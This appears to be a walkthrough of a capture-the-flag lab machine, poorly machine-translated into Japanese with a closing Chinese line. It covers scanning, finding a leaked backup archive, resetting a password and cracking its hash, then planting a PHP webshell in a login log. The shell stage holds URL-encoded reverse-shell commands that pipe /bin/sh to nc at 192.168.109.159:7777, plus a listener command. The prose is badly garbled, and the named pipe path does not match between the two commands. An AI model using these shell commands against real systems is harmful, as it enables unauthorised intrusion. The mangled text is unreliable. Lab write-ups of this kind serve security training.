1.ホストが見つかりました。
2.ポートスキャン
3.アクセスポート80を見るために
案の定、404ページ、robots.txtのを見てみましょう
4.スキャンディレクトリ
スキャンdirbusterを見て
慎重にログイン画面の外観で始まり、すぐに完全なカタログにアクセスするために有用な情報を見つけることができませんでした
ソースの表示
直接アクセスしてみてくださいません、何の結果
どのような次のディレクトリのファイルをスキャン
見るために訪問を見つけるためにのみ
バックドア圧縮ファイルがあり、見にダウンロードしよう
以下を抽出した後:
5.コード監査
最も顕著な、最初のオープンを見てdb.sql
全く言及がないかどうかを確認するために(一時的ではないことを確認何暗号化)有益な情報ID、ユーザー名、電子メール、パスワードを探すlogin.php
MD5暗号化、復号化パスワードだけ
パスワードは、デモ、参照するには、ログインしています
残念ながら、ログインに失敗した場合、設定ファイルconfig.phpを見て
プロンプトが表示されたら、dummy.phpファイルを見てみましょう
障害発生前のログインもパスワードがリセット、ルックreset.phpされていることができます
以前にユーザー名とメールボックスのリセットを試して使用して見つかりました
ユーザーはだけでもそこが見つかったかどうかを確認するためにグローバル検索を電子メールで送信することができ、存在しません
ページをリセットするには、[email protected]:NOMAN、Eメール:style.cssには、ユーザー名で見つかりました
正常にリセット、暗号化を考える前に、右下の時間、ハッシュ値を参照してください、オンライン計算を見て
パスワード(緑の部分):161c7c128ce879b5371d df4684f0338188e256c6、参照するには、ログイン
ログインに成功し、パスワードのリセット
ファイル(ログへの直接アクセスhttp://192.168.109.170/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-01-04.php)、失敗したログインの記録を
6.getshell
メールボックスのログイン時に、単語の馬のPHPを挿入
ポストパラメータが提出したログイン失敗したアクセスログ
シェルリバウンド
cmd=`mkfifo /tmp/t`;
cmd=`cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.159 7777 >/tmp/f`;
URLエンコードした後、
cmd=%60mkfifo%20%2ftmp%2ft%60%3B
cmd=%60cat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%20192.168.109.159%207777%20%3E%2ftmp%2ff%60%3B
オープンリスニング:NC -lvnp 7777
接続が表示権限を取得シェル、WHOAMIコマンド成功すると、猫は/ etc /問題バージョンを取得、あなたはまた、ドローンからバージョンを見ることができます
7.右に言及します
搜索版本漏洞:searchsploit ubuntu 16
后续步骤与下面链接中靶机提权步骤一致